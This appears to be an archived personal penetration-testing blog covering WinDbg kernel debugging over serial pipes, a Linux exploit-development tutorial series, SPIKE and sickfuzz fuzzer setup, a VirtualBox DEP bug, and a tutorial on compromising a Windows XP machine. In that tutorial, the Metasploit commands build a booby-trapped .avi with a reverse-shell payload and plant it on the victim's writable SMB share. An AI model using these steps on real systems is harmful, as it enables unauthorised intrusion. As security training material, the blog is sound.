Remote kernel debugging using Windbg.

In the following article we will discuss two different methods of remote kernel debugging using Windbg and also various operating systems. Let's begin!

NOTE: It is recommended that you use VMware for this I have NOT tested this on any other virtualisation software.

1. VirtualKD:

Giving the fact that this is a straight forward installation we will not be covering this in depth, you can find information and the download link on the official website at:-

http://virtualkd.sysprogs.org/

Important notes:

- This only works between a HOST and Virtual Machine it will NOT WORK between two virtual machines.
- Very fast debugging compared to Serial Ports.
- Only works on a Windows host so if you with to do this on OS X or Linux this will not help you. (There might be other similar software to help you achieve this however I am not aware of any)

2. Serial Ports:

This method even though it's documented I found that most of the online sources I found were missing different steps or were covering an older version of VMware. For the following example we will use the following names:

"DEBUGEE" - Machine to be debugged.
"DEBUGGER" - Machine which runs the debugger.

Make sure you have Windows Debugging tools installed on the debugger, if you do not you can download and install it at the following url:-

http://msdn.microsoft.com/en-us/windows/hardware/gg463009.aspx

The next step is to edit the .vmx file of both debugger and debugee, before saving the changed make sure you have no serialport0 line before.

WINDOWS:
* DEBUGGER:

serial0.present = "FALSE"
serial1.present = "TRUE"
serial1.fileType = "pipe"
serial1.yieldOnMsrRead = "TRUE"
serial1.startConnected = "TRUE"
serial1.fileName = "\\.\pipe\D:\windbg"
serial1.pipe.endPoint = "client"
* DEBUGEE:

serial0.present = "FALSE"
serial1.present = "TRUE"
serial1.fileType = "pipe"
serial1.yieldOnMsrRead = "TRUE"
serial1.startConnected = "TRUE"
serial1.fileName = "\\.\pipe\D:\windbg"
Of course the fileName should be a valid path.

OS X / LINUX:
* DEBUGGER:

serial0.present = "FALSE"
serial1.present = "TRUE"
serial1.fileType = "pipe"
serial1.yieldOnMsrRead = "TRUE"
serial1.startConnected = "TRUE"
serial1.fileName = "/private/tmp/windbg"
serial1.pipe.endPoint = "client"

* DEBUGEE:

serial0.present = "FALSE"
serial1.present = "TRUE"
serial1.fileType = "pipe"
serial1.yieldOnMsrRead = "TRUE"
serial1.startConnected = "TRUE"
serial1.fileName = "/private/tmp/windbg"
The same thing applies here, fileName should be a valid path.
Now there is only one step left to do and that is to edit the c:\boot.ini on the debugee and add a line as follows:

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows Server 2003 Debug" /fastdetect /NoExecute=OptIn /debug /debugport=com2 /baudrate=115200

The above method only applies to Windows XP/2003 for further version you can use bcdedit.exe as follows:

bcdedit /debug on
bcdedit /enum (to see if debug mode is on)
bcedit /dbgsettings Serial debugport:<com_port> baudrate:115200

The last thing you need to do is open Windbg on your debugger and go to "File -> Kernel Debugging" (make sure you select com2 on port) and reboot your debugee machine.

Linux exploit development part 4 - ASCII armor bypass + return-to-plt

I know it's been a lot of time since the last paper but this one gave me some headaches.

Download: Linux exploit development part 4 - ASCII armor bypass + return-to-plt

Linux exploit development part 3 (rev 2) - Real app demo ret2libc

As you have probably expected this is the real application demo + video demo of my part 3 of the Linux exploit development series.

Technical paper: Linux exploit development part 3 - ret2libc
Demo paper: Linux exploit development part 3 (rev 2) - Real app demo ret2libc
Video demo:

Linux exploit development part 3 (rev 2) - Real app demo from sickness on Vimeo.

Linux Exploit Development Pt 2 (rev 2) - Real App Demo (part 2)

Question:
In short why another part 2 if we already have one?

Answer:
Recently I've been receiving feedback from people who have read the papers and amongst those _sinn3r and corelanc0d3r actually recommended I should also give examples using real vulnerable application.

About the paper:
I will not be repeating myself, this paper does not contain any theory in it. If you do not have the required knowledge I suggest you first read my part 2 paper before trying this: Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg

The paper can be found here and long with the paper I've also made a quick video demonstration:

Linux exploit development part 2 (rev 2) - Demo from sickness on Vimeo.

Hope you enjoy it and have fun :)

Linux exploit development part 3 - ret2libc

I'm not going to repeat myself from the paper, this will just be a short description of what the paper contains.

So in the previous tutorials our exploits were made on Backtrack 4 R2 now we are going to make them on Debian Squeeze (latest) because Backtrack does not have DEP enabled by default (PAE enabled kernel on 32 bits).

In short terms DEP or NX prevents some stack or heap memory spaces from being executed, it also prevents executable memory from being writable. This is very effective against buffer overflows that inject and execute malicious code. (More about NX here)

How to bypass this !? ... -> Linux exploit development part 3 - ret2libc.pdf

Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg

As expected the part 2 of my tutorial series, I'm not going to repeat myself again, so without any other introductions here it is:

Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg

Linux exploit development part 1 - Stack overflow.

I've started to write a series of tutorials about exploit development on Linux, this is the first part which contains a Stack overflow, with hardcoded ESP address (I know it's unreliable, that's why it's part 1).
Anyways here is the PDF: Linux exploit development part 1 - Stack overflow

Hope you enjoy it.

Installing and Tweaking SPIKE and sickfuzz v0.3

Not sure how many tried out this "fuzzer", but the v0.3 is out with more pwnsauce.

Download link: http://code.google.com/p/sickfuzz/downloads/list
svn checkout http://sickfuzz.googlecode.com/svn/trunk/ sickfuzz

New features:
- Some SPIKE tweak.
- Changed the SPIKE fuzzer.
- Modified the .spk scripts.
- More logs available.
- More detailed help screen as well as output.

Fixed bugs:
- Fixed tailing issue, now paths don't have to end with "/".
- Now stops when app crashes without going over the other scripts.

Install SPIKE and sickfuzz:

root@bt:~# apt-get install automake
root@bt:~# rm -rf /pentest/fuzzers/spike/
root@bt:~# wget -P /tmp http://www.immunitysec.com/downloads/SPIKE2.9.tgz
root@bt:~# tar xvzf /tmp/SPIKE2.9.tgz -C /pentest/fuzzers && rm /tmp/SPIKE2.9.tgz
root@bt:~# cd /pentest/fuzzers/SPIKE/SPIKE/src/

Before actually starting to compile SPIKE we will make a little tweak (thank master @lupin for this one!).
Open up spike.c, there are 2 lines that look like this:

printf("tried to send to a closed socket!\n");

Each of these 2 lines contains a "return 0;" instruction on the next line, we will replace this instruction with "exit(1);" save the file and proceed.
(NOTE: ONLY REPLACE THOSE 2 INSTRUCTIONS NOT ALL!)

snapshot_1
snapshot_2
snapshot_3
snapshot_4

Now we can proceed with SPIKE:

root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# aclocal
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# automake
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# ./configure
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# sed -i 's/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb -fno-stack-protector/g' Makefile
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# make

If you get this error:

configure: creating ./config.status
cd && /bin/sh ./config.status Makefile
/bin/sh: ./config.status: No such file or directory
make: *** [Makefile] Error 127

Execute the following commands again:

root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# aclocal
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# automake
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# ./configure
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# sed -i 's/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb -fno-stack-p$
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# make

Should have worked now.

root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# mv -f /pentest/fuzzers/SPIKE/SPIKE/src /pentest/fuzzers/spike/
root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# cd
root@bt:~# rm -rf /pentest/fuzzers/SPIKE/

root@bt:~# cd /pentest/fuzzers/
root@bt:/pentest/fuzzers# svn checkout http://sickfuzz.googlecode.com/svn/trunk sickfuzz

Also if you are interested g0tmi1k made a nice script to automate the hole process:
http://code.google.com/p/sickfuzz/downloads/list

For more info on using SPIKE check out lupin's guides:
http://resources.infosecinstitute.com/intro-to-fuzzing/
http://resources.infosecinstitute.com/fuzzer-automation-with-spike/

sickfuzz - HTTP fuzzer.

Before we get started let's start with some basic knowledge which you might or might not know:

# What is fuzzing?

So in short fuzzing is a technique used to discover coding errors in software, so it sends the specific port,app,etc. unexpected data. For example if we have a small application that asks us for a number between 1 and 10 and then divides our number to 2, what will happen if we enter "%Io&6...." ? (It's not the best example I know but I think you get the picture).

# How does this help us?

Well depending on how the application crashes we can have a number of vulnerabilities like buffer overflows, DoS, etc ...
NOTE: These definitions from above are not complete, if you want to get more details I suggest you try Google.

Before we begin some few answers to some questions that most of you will ask:

1. Why did I make a fuzzer, there are other fuzzers out there ?

Yes you are right there are a lot of other fuzzers out there, my fuzzer wasn't intended to be a public fuzzer. I started making it for personal use and to learn more about fuzzing, but some friends told me I should give it a try and publish it, maybe people will like it.

2. Why is my fuzzer more special than other fuzzers out there ?

The answer is simple, it's not! I didn't make it to be more special than other fuzzers out there, I just included some features that I needed and nothing more.

Ok now that we have covered these basic questions let's move on and see how it works and what features it has:

# What is sickfuzz?

sickfuzz is a wrapper around SPIKE written in python.

# How does it work?

It actually accepts CLI arguments and based on those it launches the SPIKE "generic_send_tcp", with custom made .spk files.

# What other features does it have?

- tshark (CLI version of wireshark support), once you start fuzzing tshark starts to capture http packets that go to your specified port for later analysis.

- checks to see if the app crashed or not, most apps usually if they receive a large number of requests, start denying them and most fuzzers see that as a crash and just stop, sickfuzz however when it encounters such a behaviour checks to see if the application did really crash or not, and if the application is still up it resumes the fuzzing process.

- It's really fast and has a lot of mutations (SPIKE rocks!)

# What do I need to run it?
- SPIKE
- Wireshark (tshark + editcap)
- Python
- Web server victims

Also g0tmi1k made a cool video, demonstrating how to use it, check it out:



Download sickfuzz

Ok not at the end I want to thank all who helped me with the fuzzer:
ArchangelAmael
Nullthread
Dinos
corelanc0d3r
g0tmi1k

g0tmi1k's blog post here.

Exploit writing made easy with !pvefindaddr.

This is a quick paper I wrote containing a tutorial on how to use !pvefindaddr made by corelanc0d3r, it does not cover the creating of an exploit only how this tool helps you in writing an exploit.

Download link: Exploit_writing_made_easy_with_pvefindaddr.pdf

ROP retn+offset and impact on stack setup.

Ok so in short, I was playing with ROP chained exploits, in particular I was making an exploit for WM Downloader.

I finally finished it and then asked corelanc0d3r from the Corelan team to test it. The exploits was good, but there were some ROP gadgets that differed so we tried to replace them and this came up: http://www.exploit-db.com/exploits/16072/

Everything seems ok ... but something was weird, as you can see we have a ROP gadget containing:
# INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4

I had some issues with padding RETN 4, so I asked corelanc0d3r for a general padding rule, and then we realized that no one actually has one. ( Or not one that we know about. ) So we started documenting it and finally this came up: Corelan Site

VBox DEP issue.

First of all here is a quick demo about the issue:

DEP Issue on VBox from sickness on Vimeo.

Ok now that you have seen the demo:

A lot of people Enable DEP on VirtualBox but did anyone test it to see if it works properly ? Well guess what it doesn't !

*How ?
Well I wanted to test some DEP bypass methods, and I just have this habit before actually trying to bypass DEP, I turn it off and test that app with a simple exploit (usually to launch calc.exe) but I forgot to turn DEP off, it remained on and when I launched the exploit I did not receive a DEP error and the calculator got executed, you can take a look at the quick video demo to check it out.

*What I did.
I started trying different things to make it work like upgrading to the latest VBox, made sure that my CPU supported NX, Enable PAE/NX from Vbox, reinstall the guest OS with PAE/NX enabled from the beginning, and others. Everything seemed ok but DEP was not working, I tried using tools like NXTEST which actually told me that DEP wasn't enabled so I tried the same configuration on Vmware and what do you know … it worked!
After saying that Vmware DEP works I asked a few people to help me confirm this Vbox issue. From the feedback of these tests I learned that only 32 bit CPU's are affected by this, DEP works on 64.

*Reason for this issue.
So after saying this issue I have reported it to the guys at Vbox who after a while told me that they have figured out what is causing the problem, it's normal but they have not documented it yet. (Great, because DEP not working is not such a big deal, what could happen !?)
QUOTE:
“For raw mode we do NOT enable NX protection by default. I'm currently not
aware of the exact reason but I believe this is to keep the code simpler
or there are some compatibility issues.”
(Yet this is not documented)

*Fix.
In order to fix this you need the following:
-NX and PAE support ( cat /proc/cpuinfo and check the flags for nx pae )
-A PAE enabled kernel ( which doesn't make much sense to me, Vmware DEP works without a PAE enabled kernel and NX and PAE are 2 different things from my point of view, but I might be wrong. )
-You also need to invoke a command from the terminal to enable NX because apparently the option “Enable PAE/NX” from Vbox doesn't work ( not sure why they included it in the first place)

Ok so in order to fix DEP in Vbox, your CPU must support NX and PAE, you must run a PAE enabled kernel and:
Open a terminal with the same privileges as your Virtual machines and type in:

"VBoxManage list vms"

You will get something like this: "Windows" {xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx}
Now issue the following command considering Windows as the name of your VM (Virtual Machines must be stopped ):

"VBoxManage setextradata “Windows” VBoxInternal/CPUM/EnableNX 1"

Now start the VM and DEP should work.

Author: sickness

Blog status update.

Due to recent events I do not have enough time to keep my blog updated very frequently, I will maintain it for the people who seek information from it and will post as soon as I have time.

Update_bt.py script.

Well I recently started learning python and at first I just wanted to see if I could do a basic update script and this is what came up

Hope you like it also I would appreciate some suggestions about what else it should contain.
It includes internet connectivity check,
This script currently:
* Upgrades/Cleans Backtrack
* Exploits: Metasploit2,3, Exploit-db, SET, FastTrack
* Vulnerability Scanners: OpenVAS, Nikto, W3AF, Nessus (if you have it)
* Wireless: Aircrack, Airodump, Kismet, Gerix

All of the following sections are included into different menus.






EDIT: Well I have taken in consideration the suggestions I received via PM so I rewrote the script and included categories and more tools, here you go:

bt_up.tar.gz

Nessus bridge for Metasploit.

Hiding meterpreter using Iexpress.

Backtrack vs Windows.

Running as root !?

Ok so a lot of you people like using Backtrack and now that it's debian based and it is possible to use it as a daily OS things have changed a bit.

Now as you know there are a few guides on how to make an unprivileged user in Backtrack.
Unprivileged user in BT
Normally it's good to make an unprivileged users but I must remind you that Backtrack is not a normal OS, most of it's applications must be run as root, it was basically made to run as root and nothing else.
If you ask people if it's ok to run as root, you will get an answer similar to this one: "It's not safe to run as root!", but did anyone tell you why ? or when is it safe to run as root ?

I'm going to try to clarify the risks and all that stuff regarding "Running as root".
Keep in mind that what I am saying here applies to normal desktop PC's or laptops, not servers ....

Ok so let's begin:

Running as root has a bright side as well as a dark side:

***BRIGHT SIDE***

As you know the "root" account on a *nix system is the most privileged account. This account allows you to do anything you want without asking questions like: changing passwords, installing applications, adding accounts, etc. The computer does not hassle you with confirmations and questions because it thinks you know what you are doing ... so if you don't log out now!
This is a good thing because it does not bother you to type sudo for everything which gets annoying after a while.

***DARK SIDE***

Now a lot of people are afraid to run as root, because they might break something ... and this is true, if you run as root and have no clue about what you are doing you might end up with 3 reinstalls per day.
Running as root is not for everyone, you need some advanced skills in using the bash + some advanced knowledge about *nix. Oh and if you can't play in the bash without typing "rm -rf /*" every 20 seconds then close this window and stop reading for your own safety.

So base line. If you are not sure you can handle it and don't want to accidentally lose your important data or stuff don't run as root.

Another thing in running as root, people often say that you should not run as root for security reasons, this is also true. If an attacker gets hold of your system he will be root and he could do anything with your PC, but now I ask you ... how many services do you need running 24/7 on your home PC/laptop ?

Sure there are other ways of getting access to your system, like if you are in a LAN with others, they could try a MITM and maybe sniff your credentials but there are programs to protect you from this kind of attacks, you can even use ettercap for this or arpwatch, I'm sure if you google this things you will come up with something.
Other methods would be to set an ev!l server with metasploit or SET and trick you in clicking it or send an email with some malicious .pdf or I don't know, now if you know you would click every link people give you and read every attachment on your email without scanning it ... close the windows NOW!

Now this are some of the security risks that you need to be aware of when running as root.
Oh and one last thing don't think that if you're not running as root you are completely bullet proof !

Sickness - Owning a windows xp with metasploit.

Ok so first of all I did not do any video editing, so don't complain about it !
Second of all excuse me if I made some English mistakes I'm not a perfect English speaker.
Third this is a basic video.

So in this tutorial I am going to show you how to own a windows XP SP2 who has the folder "My Documents" shared with read/write permissions by uploading an infected .avi file to the victim's machine.

The tools used: fping, nmap, metasploit, inguma

Commands:
Code:

fping -g 192.168.1.60 192.168.1.70
nmap -sS -sV -f -n -O 192.168.1.66
cd /pentest/exploits/framework3/
./msfconsole
cd /pentest/exploits/inguma
./inguma.py
autoscan
192.168.1.66
y
n
cd /pentest/python/impacket-examples/
./smbclient
open 192.168.1.66
login username password
shares
smbmount //192.168.1.66/Documents /media/
cd /media/
ls

Metasploit commands (making the infected .avi):
Code:

search vlc
use windows/fileformat/videolan_tivo
set PAYLOAD windows/shell_reverse_tcp
show options
set FILENAME watch_me.avi
set OUTPUTPATH /root/sickness/desktop/
set LHOST 192.168.1.64
exploit

Metasploit handler:
Code:

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.64
exploit

Code:

cd /root/sickness/desktop
mv -f watch_me.avi /media/Downloads
smbumount /media

Backtrack Products.

Well it seems like my 3-4 month signature on the Backtrack forum "I wans a Backtrack T-Shirt!" finally paid off.
This morning archangelamael just told me that I could buy one and a lot of more Backtrack accessories, but why not take a look yourself.

Backtrack Shop